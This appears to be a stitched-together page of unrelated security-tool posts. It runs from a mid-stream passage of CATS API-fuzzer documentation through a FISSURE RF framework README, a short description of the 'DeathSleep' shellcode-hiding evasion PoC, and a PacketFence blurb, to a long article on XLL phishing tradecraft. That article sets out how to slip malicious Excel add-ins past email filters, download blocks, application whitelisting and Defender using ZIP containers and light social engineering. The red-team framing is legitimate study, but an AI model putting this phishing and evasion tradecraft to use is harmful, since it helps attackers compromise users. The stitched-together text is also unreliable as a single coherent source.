Suppose the test_1 execution outputs:

{
  "pet": {
    "id": 2
  }
}

When executing test_1 the value of the pet id will be stored in the petId variable (value 2). When executing test_2 the id parameter will be replaced with the petId variable (value 2) from the previous case.

Please note: variables are visible across all custom tests; please be careful with the naming as they will get overridden.

Verifying responses

The FunctionalFuzzer can verify more than just the expectedResponseCode. This is achieved using the verify element. This is an extended version of the above functionalFuzzer.yml file.

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
    verify:
      pet#name: "Baby"
      pet#id: "[0-9]+"
/pet/{id}:
  test_2:
    description: Get a Pet
    id: ${petId}
    expectedResponseCode: 200

Considering the above file:

  • the FunctionalFuzzer will check if the response has the 2 elements pet#name and pet#id
  • if the elements are found, it will check that the pet#name has the Baby value and that the pet#id is numeric

The following json response will pass test_1:

{
  "pet": {
    "id": 2,
    "name": "Baby"
  }
}

But this one won't (pet#name is missing):

{
  "pet": {
    "id": 2
  }
}

You can also refer to request fields in the verify section by using the ${request#..} qualifier. Using the above example, by having the following verify section:

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
    verify:
      pet#name: "${request#name}"
      pet#id: "[0-9]+"

It will verify if the response contains a pet#name element and that its value equals My Pet as sent in the request.

Some notes:

  • verify parameters support Java regexes as values
  • you can supply more than one parameter to check (as seen above)
  • if at least one of the parameters is not present in the response, CATS will report an error
  • if all parameters are found and have valid values, but the response code is not matched, CATS will report a warning
  • if all the parameters are found and match their values, and the response code is as expected, CATS will report a success

Working with additionalProperties in FunctionalFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.
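
As a minimal sketch (the metadata element and its key-value pairs are hypothetical), a functionalFuzzer.yml test using this additionalProperties syntax might look like:

/pet:
  test_1:
    description: Create a Pet with extra metadata
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    additionalProperties:
      topElement: metadata
      mapValues:
        test: "value1"
        anotherTest: "value2"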

FunctionalFuzzer Reserved keywords

The following keywords are reserved in FunctionalFuzzer tests: output, expectedResponseCode, httpMethod, description, oneOfSelection, verify, additionalProperties, topElement and mapValues.

Security Fuzzer

Although CATS is not a security testing tool, you can use it to test basic security scenarios by fuzzing specific fields with different sets of nasty strings. The behaviour is similar to the FunctionalFuzzer. You can use the exact same elements for output variables, test correlation, verify responses and so forth, with the addition that you must also specify a targetFields and/or targetFieldTypes and a stringsFile element. A typical securityFuzzerFile will look like this:

/pet:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFields:
      - pet#id
      - pet#description
    stringsFile: xss.txt

And a typical run:

> cats run securityFuzzerFile.yml -c contract.yml -s http://localhost:8080

You can also supply output, httpMethod, oneOfSelection and/or verify (with the same behaviour as within the FunctionalFuzzer) if they are relevant to your case.

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example, instead of '.'.

This is what the SecurityFuzzer will do after parsing the above securityFuzzerFile:

  • it will add the fixed value "My Pet" to all the requests for the name field
  • for each field specified in the targetFields i.e. pet#id and pet#description it will create requests for each line from the xss.txt file and supply those values in each field
  • if you consider the xss.txt sample file included in the CATS repo, this means that it will send 21 requests targeting pet#id and 21 requests targeting pet#description i.e. a total of 42 tests
  • for each of these 42 tests, the SecurityFuzzer will expect a 200 response code. If another response code is returned, then CATS will report the test as an error.

If you want the above logic to apply to all paths, you can use all as the path name:

all:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFields:
      - pet#id
      - pet#description
    stringsFile: xss.txt

Instead of specifying the field names, you can broaden the scope to target certain field types. For example, if you want to test for XSS in all string fields, you can have the following securityFuzzerFile:

all:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFieldTypes:
      - string
    stringsFile: xss.txt

As an idea on how to create security tests, you can split the nasty strings into multiple files of interest in your particular context. You can have a sql_injection.txt, an xss.txt, a command_injection.txt and so on. For each of these files, you can create a test entry in the securityFuzzerFile where you include the fields you think are meaningful for these types of tests. (It was a deliberate choice (for now) to not include all fields by default.) The expectedResponseCode should be tweaked according to your particular context. Your service might sanitize data before validation, so it might be perfectly valid to expect a 200, or it might validate the fields directly, in which case a 400 might be the expected response. A 500 will usually mean something was not handled properly and might signal a possible bug.
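
As a rough sketch of this idea (the file names, expected response codes and target field types are assumptions to adapt to your own context), a securityFuzzerFile covering several payload classes might look like:

all:
  test_1:
    description: Run XSS scenarios
    expectedResponseCode: 200
    httpMethod: all
    targetFieldTypes:
      - string
    stringsFile: xss.txt
  test_2:
    description: Run SQL injection scenarios
    expectedResponseCode: 400
    httpMethod: all
    targetFieldTypes:
      - string
    stringsFile: sql_injection.txt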

Working with additionalProperties in SecurityFuzzer

You can also set additionalProperties fields through the securityFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

SecurityFuzzer Reserved keywords

The following keywords are reserved in SecurityFuzzer tests: output, expectedResponseCode, httpMethod, description, verify, oneOfSelection, targetFields, targetFieldTypes, stringsFile, additionalProperties, topElement and mapValues.

TemplateFuzzer

The TemplateFuzzer can be used to fuzz non-OpenAPI endpoints. If the target API does not have an OpenAPI spec available, you can use a request template to run a limited set of fuzzers. The syntax for running the TemplateFuzzer is as follows (very similar to curl):

> cats fuzz -H header=value -X POST -d '{"field1":"value1","field2":"value2","field3":"value3"}' -t "field1,field2,header" -i "2XX,4XX" http://service-url 

The command will:

  • send a POST request to http://service-url
  • use the {"field1":"value1","field2":"value2","field3":"value3"} as a template
  • replace field1, field2 and header one by one with fuzz data and send each request to the service endpoint
  • ignore 2XX,4XX response codes and report an error when the received response code is not in this list

It was a deliberate choice to limit the fields for which the Fuzzer will run by supplying them using the -t argument. For nested objects, supply fully qualified names: field.subfield.

Headers can also be fuzzed using the same mechanism as the fields.

This Fuzzer will send the following type of data:

  • null values
  • empty values
  • zalgo text
  • abugidas characters
  • large random unicode data
  • very large strings (80k characters)
  • single and multi code point emojis
  • unicode control characters
  • unicode separators
  • unicode whitespaces

For a full list of options run > cats fuzz -h.

You can also supply your own dictionary of data using the -w file argument.
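
For example (my_dictionary.txt is a hypothetical file holding one payload per line), a run with a custom dictionary might look like:

> cats fuzz -w my_dictionary.txt -H header=value -X POST -d '{"field1":"value1"}' -t "field1,header" -i "2XX,4XX" http://service-url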

HTTP methods with bodies will only be fuzzed at the request payload and headers level.

HTTP methods without bodies will be fuzzed at path and query parameters and headers level. In this case you don't need to supply a -d argument.

This is an example for a GET request:

> cats fuzz -X GET -t "path1,query1" -i "2XX,4XX" http://service-url/paths1?query1=test&query2

Reference Data File

There are often cases where some fields need to contain relevant business values in order for a request to succeed. You can provide such values using a reference data file specified by the --refData argument. The reference data file is a YAML-format file that contains specific fixed values for different paths in the request document. The file structure is as follows:

/path/0.1/auth:
  prop#subprop: 12
  prop2: 33
  prop3#subprop1#subprop2: "test"
/path/0.1/cancel:
  prop#test: 1

For each path you can supply custom values for properties and sub-properties which will have priority over values supplied by any other Fuzzer. Consider this request payload:

{
  "address": {
    "phone": "123",
    "postCode": "408",
    "street": "cool street"
  },
  "name": "Joe"
}

and the following reference data file:

/path/0.1/auth:
  address#street: "My Street"
  name: "John"

This will result in any fuzzed request to the /path/0.1/auth endpoint being updated to contain the supplied fixed values:

{
  "address": {
    "phone": "123",
    "postCode": "408",
    "street": "My Street"
  },
  "name": "John"
}

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above, instead of '.'.

You can use environment (system) variables in a ref data file using: $$VARIABLE_NAME. (notice double $$)
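
For example, assuming a MY_STREET environment variable is exported before the run, a refData entry might reference it like this:

/path/0.1/auth:
  address#street: $$MY_STREET
  name: "John"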

Setting additionalProperties

As additional properties are maps i.e. they don't actually have a structure, CATS cannot currently generate valid values. If the elements within such a data structure are essential for a request, you can supply them via the refData file using the following syntax:

/path/0.1/auth:
  address#street: "My Street"
  name: "John"
  additionalProperties:
    topElement: metadata
    mapValues:
      test: "value1"
      anotherTest: "value2"

The additionalProperties element must contain the actual key-value pairs to be sent within the requests and also a top element if needed. topElement is not mandatory. The above example will output the following json (considering also the above examples):

{
  "address": {
    "phone": "123",
    "postCode": "408",
    "street": "My Street"
  },
  "name": "John",
  "metadata": {
    "test": "value1",
    "anotherTest": "value2"
  }
}

RefData reserved keywords

The following keywords are reserved in a reference data file: additionalProperties, topElement and mapValues.

Sending ref data for ALL paths

You can also send the same reference data for ALL paths (just like you do with the headers). You can achieve this by using all as a key in the refData file:

all:
  address#zip: 123

This will try to replace address#zip in all requests (if the field is present).

Removing fields

There are (rare) cases when some fields may not make sense together. Something like: if you send firstName and lastName, you are not allowed to also send name. As OpenAPI does not have the capability to define request fields which are dependent on each other, you can use the refData file to instruct CATS to remove fields before sending a request to the service. You can achieve this by using cats_remove_field as a value for the fields you want to remove. For the above case the refData file will look as follows:

all:
  name: "cats_remove_field"

Creating a Ref Data file with the FunctionalFuzzer

You can leverage the fact that the FunctionalFuzzer can run functional flows in order to create dynamic --refData files which don't need the reference data values to be set manually. The --refData file must be created with variables ${variable} instead of fixed values, and those variables must be output variables in the functionalFuzzer.yml file. In order for the FunctionalFuzzer to properly replace the variable names with their values you must supply the --refData file as an argument when the FunctionalFuzzer runs.

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080 --refData=refData.yml

The functionalFuzzer.yml file:

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id

The refData.yml file:

/pet-type:
  id: ${petId}

After running CATS using the command and the 2 files above, you will get a refData_replaced.yml file where the id will get the value returned into the petId variable.

The refData_replaced.yml:

/pet-type:
  id: 123

You can now use the refData_replaced.yml as a --refData file for running CATS with the rest of the Fuzzers.

Headers File

This can be used to send custom fixed headers with each payload. It is useful when you have authentication tokens you want to use to authenticate the API calls. You can use path specific headers or common headers that will be added to each call using an all element. Specific paths will take precedence over the all element. Sample headers file:

all:
  Accept: application/json
/path/0.1/auth:
  jwt: XXXXXXXXXXXXX
/path/0.2/cancel:
  jwt: YYYYYYYYYYYYY

This will add the Accept header to all calls and the jwt header to the specified paths. You can use environment (system) variables in a headers file using: $$VARIABLE_NAME. (notice double $$)
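
For example, assuming the token is exported as a JWT_TOKEN environment variable before the run, the headers file might look like:

all:
  Accept: application/json
/path/0.1/auth:
  jwt: $$JWT_TOKEN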

DELETE requests

DELETE is the only HTTP verb that is intended to remove resources, and executing the same DELETE request twice will result in the second one failing as the resource is no longer available. It would be pretty heavy to supply a large list of identifiers within the --refData file, which is why the recommendation used to be to skip the DELETE method when running CATS.

But starting with version 7.0.2 CATS has some intelligence in dealing with DELETE. In order to have enough valid entities CATS will save the corresponding POST requests in an internal Queue, and every time a DELETE request is executed it will poll data from there. For this to actually work, your contract must comply with common sense conventions:

  • the DELETE path is actually the POST path plus an identifier: if POST is /pets, then DELETE is expected to be /pets/{petId}.
  • CATS will try to match the {petId} parameter within the body returned by the POST request while doing various combinations of the petId name. It will try to search for the following entries: petId, id, pet-id, pet_id with different cases.
  • If any of those entries is found within a stored POST result, it will replace the {petId} with that value

For example, suppose that a POST to /pets responds with:

{
  "pet_id": 2,
  "name": "Chuck"
}

When doing a DELETE request, CATS will discover that {petId} and pet_id are used as identifiers for the Pet resource, and will do the DELETE at /pets/2.

If these conventions are followed (which also align to good REST naming practices), it is expected that DELETE and POST requests will be on-par for most of the entities.

Content Negotiation

Some APIs might use content negotiation versioning which implies formats like application/v11+json in the Accept header.

You can handle this in CATS as follows:

  • if the OpenAPI contract defines its content as:
 requestBody:
   required: true
   content:
     application/v5+json:
       schema:
         $ref: '#/components/RequestV5'
     application/v6+json:
       schema:
         $ref: '#/components/RequestV6'

by having clear separation between versions, you can pass the --contentType argument with the version you want to test: cats ... --contentType="application/v6+json".

If the OpenAPI contract is not version aware (you already exported it specific to a version) and the content looks as:

 requestBody:
   required: true
   content:
     application/json:
       schema:
         $ref: '#/components/RequestV5'

and you still need to pass the application/v5+json Accept header, you can use the --headers file to add it:

all:
  Accept: "application/v5+json"

Edge Spaces Strategy

There isn't a consensus on how you should handle situations when you trail or prefix valid values with spaces. One strategy is to have the service trim spaces before doing the validation, while other services will just validate the values as they are. You can control how CATS should expect such cases to be handled by the service using the --edgeSpacesStrategy argument. You can set this to trimAndValidate or validateAndTrim depending on how you expect the service to behave:

  • trimAndValidate means that the service will first trim the spaces and after that run the validation
  • validateAndTrim means that the service runs the validation first without any trimming of spaces

This is a global setting i.e. configured when CATS starts, and all Fuzzers expect a consistent behaviour from all the service endpoints.
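
For example, a run expecting the service to trim values before validating them might look like (my.yml is a placeholder contract):

> cats --contract=my.yml --server=http://localhost:8080 --edgeSpacesStrategy=trimAndValidate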

URL Parameters

There are cases when certain parts of the request URL are parameterized. For example a case like: /{version}/pets. {version} is supposed to have the same value for all requests. This is why you can supply actual values to replace such parameters using the --urlParams argument. You can supply a ; separated list of name:value pairs to replace the name parameters with their corresponding value. For example supplying --urlParams=version:v1.0 will replace the version parameter from the above example with the value v1.0.

Dealing with AnyOf, AllOf and OneOf

CATS also supports schemas with oneOf, allOf and anyOf composition. CATS will consider all possible combinations when creating the fuzzed payloads.

Dynamic values in configuration files

The following configuration files: securityFuzzerFile, functionalFuzzerFile, refData support setting dynamic values for the inner fields. For now the support only exists for java.time.* and org.apache.commons.lang3.*, but more types of elements will come in the near future.

Let's suppose you have a date/date-time field, and you want to set it to 10 days from now. You can do this by setting this as a value T(java.time.OffsetDateTime).now().plusDays(10). This will return an ISO compliant time in UTC format.

A functionalFuzzer using this can look like:

/path:
  testNumber:
    description: Short description of the test
    prop: value
    prop#subprop: "T(java.time.OffsetDateTime).now().plusDays(10)"
    prop7:
      - value1
      - value2
      - value3
    oneOfSelection:
      element#type: "Value"
    expectedResponseCode: HTTP_CODE
    httpMethod: HTTP_METHOD

You can also check the responses using a similar syntax, also accounting for the actual values returned in the response. This is a syntax that can test if a returned date is after the current date: T(java.time.LocalDate).now().isBefore(T(java.time.LocalDate).parse(expiry.toString())). It will check if the expiry field returned in the json response, parsed as a date, is after the current date.
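
As a sketch (the /order path and expiry field are hypothetical, and this assumes the expression can be supplied directly as a verify value), such a check could sit in the verify section of a functionalFuzzer test:

/order:
  test_1:
    description: Create an order and check that the expiry date is in the future
    httpMethod: POST
    expectedResponseCode: 200
    verify:
      expiry: "T(java.time.LocalDate).now().isBefore(T(java.time.LocalDate).parse(expiry.toString()))"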

The syntax of dynamically setting dates is compliant with the Spring Expression Language specs.

Running behind proxy

If you need to run CATS behind a proxy, you can supply the following arguments: --proxyHost and --proxyPort. A typical run with proxy settings on localhost:8080 will look as follows:

> cats --contract=YAML_FILE --server=SERVER_URL --proxyHost=localhost --proxyPort=8080

Dealing with Authentication

HTTP header(s) based authentication

CATS supports any form of HTTP header(s) based authentication (basic auth, oauth, custom JWT, apiKey, etc) using the headers mechanism. You can supply the specific HTTP header name and value and apply them to all endpoints. Additionally, basic auth is also supported using the --basicauth=USR:PWD argument.
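
For example, a run authenticating with basic auth, or alternatively with a custom header supplied through a headers file, might look like (the credentials and file names are placeholders):

> cats --contract=my.yml --server=http://localhost:8080 --basicauth=myUser:myPassword
> cats --contract=my.yml --server=http://localhost:8080 --headers=headers.yml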

One-Way or Two-Way SSL

By default, CATS trusts all server certificates and doesn't perform hostname verification.

For two-way SSL you can specify a JKS file (Java Keystore) that holds the client's private key using the following arguments:

  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key within the sslKeystore

For details on how to load the certificate and private key into a Java Keystore you can use this guide: https://mrkandreev.name/blog/java-two-way-ssl/.

Limitations

Native Binaries

When using the native binaries (not the uberjar) there might be issues when using dynamic values in the CATS files. This is due to the fact that GraalVM only bundles whatever it can discover at compile time. The following classes are currently supported:

java.util.Base64.Encoder.class, java.util.Base64.Decoder.class, java.util.Base64.class, org.apache.commons.lang3.RandomUtils.class, org.apache.commons.lang3.RandomStringUtils.class, 
org.apache.commons.lang3.DateFormatUtils.class, org.apache.commons.lang3.DateUtils.class,
org.apache.commons.lang3.DurationUtils.class, java.time.LocalDate.class, java.time.LocalDateTime.class, java.time.OffsetDateTime.class

API specs

At this moment, CATS only works with OpenAPI specs and has limited functionality using template payloads through the cats fuzz ... subcommand.

Media types and HTTP methods

The Fuzzers have the following support for media types and HTTP methods:

  • application/json and application/x-www-form-urlencoded media types only
  • HTTP methods: POST, PUT, PATCH, GET and DELETE

Additional Parameters

If a response contains a free Map specified using the additionalParameters tag CATS will issue a WARN level log message as it won't be able to validate that the response matches the schema.

Regexes within 'pattern'

CATS uses RgxGen in order to generate Strings based on regexes. This has certain limitations mostly with complex patterns.

Custom Files General Info

All custom files that can be used by CATS (functionalFuzzerFile, headers, refData, etc) are in a YAML format. When setting or getting values to/from JSON for input and/or output variables, you must use a JsonPath syntax using either # or . as separators. You can find some selector examples here: JsonPath.
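
As a quick illustration, for a payload like {"pet": {"owner": {"name": "Joe"}}} the following two selectors point to the same field:

pet#owner#name
pet.owner.name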

Contributing

Please refer to CONTRIBUTING.md.



FISSURE - Frequency Independent SDR-based Signal Understanding and Reverse Engineering


Frequency Independent SDR-based Signal Understanding and Reverse Engineering

FISSURE is an open-source RF and reverse engineering framework designed for all skill levels with hooks for signal detection and classification, protocol discovery, attack execution, IQ manipulation, vulnerability analysis, automation, and AI/ML. The framework was built to promote the rapid integration of software modules, radios, protocols, signal data, scripts, flow graphs, reference material, and third-party tools. FISSURE is a workflow enabler that keeps software in one location and allows teams to effortlessly get up to speed while sharing the same proven baseline configuration for specific Linux distributions.

The framework and tools included with FISSURE are designed to detect the presence of RF energy, understand the characteristics of a signal, collect and analyze samples, develop transmit and/or injection techniques, and craft custom payloads or messages. FISSURE contains a growing library of protocol and signal information to assist in identification, packet crafting, and fuzzing. Online archive capabilities exist to download signal files and build playlists to simulate traffic and test systems.

The friendly Python codebase and user interface allow beginners to quickly learn about popular tools and techniques involving RF and reverse engineering. Educators in cybersecurity and engineering can take advantage of the built-in material or utilize the framework to demonstrate their own real-world applications. Developers and researchers can use FISSURE for their daily tasks or to expose their cutting-edge solutions to a wider audience. As awareness and usage of FISSURE grows in the community, so will the extent of its capabilities and the breadth of the technology it encompasses.


Getting Started

Supported

There are two branches within FISSURE to make file navigation easier and reduce code redundancy. The Python2_maint-3.7 branch contains a codebase built around Python2, PyQt4, and GNU Radio 3.7; while the Python3_maint-3.8 branch is built around Python3, PyQt5, and GNU Radio 3.8.

Operating System FISSURE Branch
Ubuntu 18.04 (x64) Python2_maint-3.7
Ubuntu 18.04.5 (x64) Python2_maint-3.7
Ubuntu 18.04.6 (x64) Python2_maint-3.7
Ubuntu 20.04.1 (x64) Python3_maint-3.8
Ubuntu 20.04.4 (x64) Python3_maint-3.8

In-Progress (beta)

Operating System FISSURE Branch
Ubuntu 22.04 (x64) Python3_maint-3.8

Note: Certain software tools do not work for every OS. Refer to Software And Conflicts

Installation

git clone https://github.com/ainfosec/fissure.git
cd FISSURE
git checkout <Python2_maint-3.7> or <Python3_maint-3.8>
./install

This will automatically install PyQt software dependencies required to launch the installation GUIs if they are not found.

Next, select the option that best matches your operating system (should be detected automatically if your OS matches an option).



It is recommended to install FISSURE on a clean operating system to avoid existing conflicts. Select all the recommended checkboxes (Default button) to avoid errors while operating the various tools within FISSURE. There will be multiple prompts throughout the installation, mostly asking for elevated permissions and user names. If an item contains a "Verify" section at the end, the installer will run the command that follows and highlight the checkbox item green or red depending on if any errors are produced by the command. Checked items without a "Verify" section will remain black following the installation.


Usage

fissure

Refer to the FISSURE Help menu for more details on usage.

Details

Components

  • Dashboard
  • Central Hub (HIPRFISR)
  • Target Signal Identification (TSI)
  • Protocol Discovery (PD)
  • Flow Graph & Script Executor (FGE)


Capabilities

Signal Detector



IQ Manipulation


Signal Lookup


Pattern Recognition


Attacks


Fuzzing


Signal Playlists


Image Gallery


Packet Crafting


Scapy Integration


CRC Calculator


Logging


Lessons

FISSURE comes with several helpful guides to become familiar with different technologies and techniques. Many include steps for using various tools that are integrated into FISSURE.

  • Lesson1: OpenBTS
  • Lesson2: Lua Dissectors
  • Lesson3: Sound eXchange
  • Lesson4: ESP Boards
  • Lesson5: Radiosonde Tracking
  • Lesson6: RFID
  • Lesson7: Data Types
  • Lesson8: Custom GNU Radio Blocks
  • Lesson9: TPMS
  • Lesson10: Ham Radio Exams
  • Lesson11: Wi-Fi Tools

Roadmap

  • Add more hardware types, RF protocols, signal parameters, analysis tools
  • Support more operating systems
  • Create a signal conditioner, feature extractor, and signal classifier with selectable AI/ML techniques
  • Develop class material around FISSURE (RF Attacks, Wi-Fi, GNU Radio, PyQt, etc.)
  • Transition the main FISSURE components to a generic sensor node deployment scheme

Contributing

Suggestions for improving FISSURE are strongly encouraged. Leave a comment in the Discussions page if you have any thoughts regarding the following:

  • New feature suggestions and design changes
  • Software tools with installation steps
  • New lessons or additional material for existing lessons
  • RF protocols of interest
  • More hardware and SDR types for integration
  • IQ analysis scripts in Python
  • Installation corrections and improvements

Contributions to improve FISSURE are crucial to expediting its development. Any contributions you make are greatly appreciated. If you wish to contribute through code development, please fork the repo and create a pull request:

  1. Fork the project
  2. Create your feature branch (git checkout -b feature/AmazingFeature)
  3. Commit your changes (git commit -m 'Add some AmazingFeature')
  4. Push to the branch (git push origin feature/AmazingFeature)
  5. Open a pull request

Creating Issues to bring attention to bugs is also welcomed.

Collaborating

Contact Assured Information Security, Inc. (AIS) Business Development to propose and formalize any FISSURE collaboration opportunities, whether that is through dedicating time towards integrating your software, having the talented people at AIS develop solutions for your technical challenges, or integrating FISSURE into other platforms/applications.

License

GPL-3.0

For license details, see LICENSE file.

Contact

Follow on Twitter: @FissureRF, @AinfoSec

Chris Poore - Assured Information Security, Inc. - poorec@ainfosec.com

Business Development - Assured Information Security, Inc. - bd@ainfosec.com

Acknowledgments

Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions to this project.



DeathSleep - A PoC Implementation For An Evasion Technique To Terminate The Current Thread And Restore It Before Resuming Execution, While Implementing Page Protection Changes During No Execution


A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.


Intro

Sleep and obfuscation methods are well known in the maldev community. With different implementations, they have the objective of hiding from memory scanners while sleeping, usually changing page protections and even adding cool features like encrypting the shellcode. But there is another important point to hiding our shellcode, and that is hiding the current execution thread. Spoofing the stack is cool, but after thinking a little about it I thought that there is no need to spoof the stack... if there is no stack :)

The usability of this technique is left to the reader to assess, but in any case, I think it is a cool way to review some topics, and learn some maldev for those who, like me, are starting in this world.

The main implementation shown here holds everything that we need to take out of the stack in the data section, as global variables, but an implementation moving everything to the heap will be published soon. It aims to show some key modifications that need to be done to make this code PIC and injectable.

This repository is mirrored between GitHub and GitLab.



Packet Fence 12.0.0

PacketFence is a network access control (NAC) system. It is actively maintained and has been deployed in numerous large-scale institutions. It can be used to effectively secure networks, from small to very large heterogeneous networks. PacketFence provides NAC-oriented features such as registration of new network devices, detection of abnormal network activities including from remote snort sensors, isolation of problematic devices, remediation through a captive portal, and registration-based and scheduled vulnerability scans.

XLL_Phishing - XLL Phishing Tradecraft


With Microsoft's recent announcement regarding the blocking of macros in documents originating from the internet (email AND web download), attackers have begun aggressively exploring other options to achieve user driven access (UDA). There are several considerations to be weighed and balanced when looking for a viable phishing for access method:

  1. Complexity - The more steps that are required on the user's part, the less likely we are to be successful.
  2. Specificity - Are most victim machines susceptible to your attack? Is your attack architecture specific? Does certain software need to be installed?
  3. Delivery - Are there network/policy mitigations in place on the target network that limit how you could deliver your maldoc?
  4. Defenses - Is application whitelisting enforced?
  5. Detection - What kind of AV/EDR is the client running?

These are the major questions, however there are certainly more. Things get more complex as you realize that these factors compound each other; for example, if a client has a web proxy that prohibits the download of executables or DLL's, you may need to stick your payload inside a container (ZIP, ISO, etc). Doing so can present further issues down the road when it comes to detection. More robust defenses require more complex combinations of techniques to defeat.

This article will be written with a fictional target organization in mind; this organization has employed several defensive measures including email filtering rules, blacklisting certain file types from being downloaded, application whitelisting on endpoints, and Microsoft Defender for Endpoint as an EDR solution.

Real organizations may employ none of these, some, or even more defenses which can simplify or complicate the techniques outlined in this research. As always, know your target.


What are XLL's?

XLL's are DLL's, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal Excel documents.


XLL's provide a very attractive option for UDA given that they are executed by Microsoft Excel, a very commonly encountered software in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass Application Whitelisting rules because a trusted application (Excel) is executing it. XLL's can be written in C, C++, or C# which provides a great deal more flexibility and power (and sanity) than VBA macros which further makes them a desirable choice.

The downside of course is that there are very few legitimate uses for XLL's, so it SHOULD be a very easy box to check for organizations to block the download of that file extension through both email and web download. Sadly many organizations are years behind the curve and as such XLL's stand to be a viable method of phishing for some time.

There are a series of different events that can be used to execute code within an XLL, the most notable of which is xlAutoOpen. The full list may be seen here:


Upon double clicking an XLL, the user is greeted by this screen:


This single dialog box is all that stands between the user and code execution; with fairly thin social engineering, code execution is all but assured.

Something that must be kept in mind is that XLL's, being executables, are architecture specific. This means that you must know your target; the version of Microsoft Office/Excel that the target organization utilizes will (usually) dictate what architecture you need to build your payload for.

There is a pretty clean break in Office versions that can be used as a rule of thumb:

Office 2016 or earlier: x86

Office 2019 or later: x64

It should be noted that it is possible to install the other architecture for each product, however these are the default architectures installed and in most cases this should be a reliable way to make a decision about which architecture to roll your XLL for. Of course depending on the delivery method and pretexting used as part of the phishing campaign, it is possible to provide both versions and rely on the victim to select the appropriate version for their system.

Resources

The XLL payload that was built during this research was based on this project by edparcell. His repository has good instructions on getting started with XLL's in Visual Studio, and I used his code as a starting point to develop a malicious XLL file.

A notable deviation from his repository is that should you wish to create your own XLL project, you will need to download the latest Excel SDK and then follow the instructions on the previously linked repo using this version as opposed to the 2010 version of the SDK mentioned in the README.

Delivery

Delivery of the payload is a serious consideration in context of UDA. There are two primary methods we will focus on:

  1. Email Attachment
  2. Web Delivery

Email Attachment

Either via attaching a file or including a link to a website where a file may be downloaded, email is a critical part of the UDA process. Over the years many organizations (and email providers) have matured and enforced rules to protect users and organizations from malicious attachments. Mileage will vary, but organizations now have the capability to:

  1. Block executable attachments (EXE, DLL, XLL, MZ headers overall)
  2. Block containers like ISO/IMG which are mountable and may contain executable content
  3. Examine zip files and block those containing executable content
  4. Block zip files that are password protected
  5. More

Fuzzing an organization's email rules can be an important part of an engagement, however care must always be taken so as to not tip one's hand that a Red Team operation is ongoing and that information is actively being gathered.

For the purposes of this article, it will be assumed that the target organization has robust email attachment rules that prevent the delivery of an XLL payload. We will pivot and look at web delivery.

Web Delivery

Email will still be used in this attack vector, however rather than sending an attachment it will be used to send a link to a website. Web proxy rules and network mitigations controlling allowed file download types can differ from those enforced in regards to email attachments. For the purposes of this article, it is assumed that the organization prevents the download of executable files (MZ headers) from the web. This being the case, it is worth exploring packers/containers.

The premise is that we might be able to stick our executable inside another file type and smuggle it past the organization's policies. A major consideration here is native support for the file type; 7Z files for example cannot be opened by Windows without installing third party software, so they are not a great choice. Formats like ZIP, ISO, and IMG are attractive choices because they are supported natively by Windows, and as an added bonus they add very few extra steps for the victim.

Unfortunately, the organization blocks ISOs and IMGs from being downloaded from the web; additionally, because it employs Data Loss Prevention (DLP), users are unable to mount external storage devices, which is how ISOs and IMGs are treated.

Luckily for us, even though the organization prevents the download of MZ-headered files, it does allow the download of zip files containing executables. These zip files are actively scanned for malware, including prompting the user for the password of password-protected zips; however, because the executable is zipped, it is not blocked by the otherwise blanket deny for MZ files.

Zip files and execution

Zip files were chosen as a container for our XLL payload because:

  1. They are natively compatible with Windows
  2. They are allowed to be downloaded from the internet by the organization
  3. They add very little additional complexity to the attack

Conveniently, double clicking a ZIP file on Windows will open that zip file in File Explorer:


Less conveniently, double clicking the XLL file from the zipped location triggers Windows Defender, even when using the stock project from edparcell that doesn't contain any kind of malicious code.


Looking at the Windows Defender alert we see it is just a generic "Wacatac" alert:


However, there is something odd: the file it identified as malicious was in c:\users\user\Appdata\Local\Temp\Temp1_ZippedXLL.zip, not C:\users\user\Downloads\ZippedXLL\ where we double clicked it. Looking at the Excel instance in ProcessExplorer shows that Excel is actually running the XLL from appdata\local\temp, not from the ZIP file that it came in:


This appears to be a wrinkle associated with ZIP files, not XLLs. Opening a TXT file from within a zip using Notepad also results in the TXT file being copied to appdata\local\temp and opened from there. While opening a text file from this location is fine, Defender seems to identify any sort of actual code execution in this location as malicious.

If a user were to extract the XLL from the ZIP file and then run it, it would execute without any issue; however, there is no way to guarantee that a user does this, and we really can't roll the dice on popping AV/EDR should they not extract it. Besides, double clicking the ZIP and then double clicking the XLL is far simpler, and a victim is far more likely to complete those simple actions than to go to the trouble of extracting the ZIP.

This problem caused me to begin considering a different payload type than XLLs; I began exploring VSTOs (Visual Studio Tools for Office). I highly encourage you to check out that article.

VSTOs ultimately call a DLL, which can either be located locally alongside the .XLSX that initiates everything, or hosted remotely and downloaded by the .XLSX via HTTP/HTTPS. The local option provides no real advantages (and in fact several disadvantages, in that there are several more files associated with a VSTO attack), and the remote option unfortunately requires a code signing certificate or for the remote location to be a trusted network. Not having a valid code signing cert, VSTOs do not mitigate any of the issues in this scenario that our XLL payload is running into.

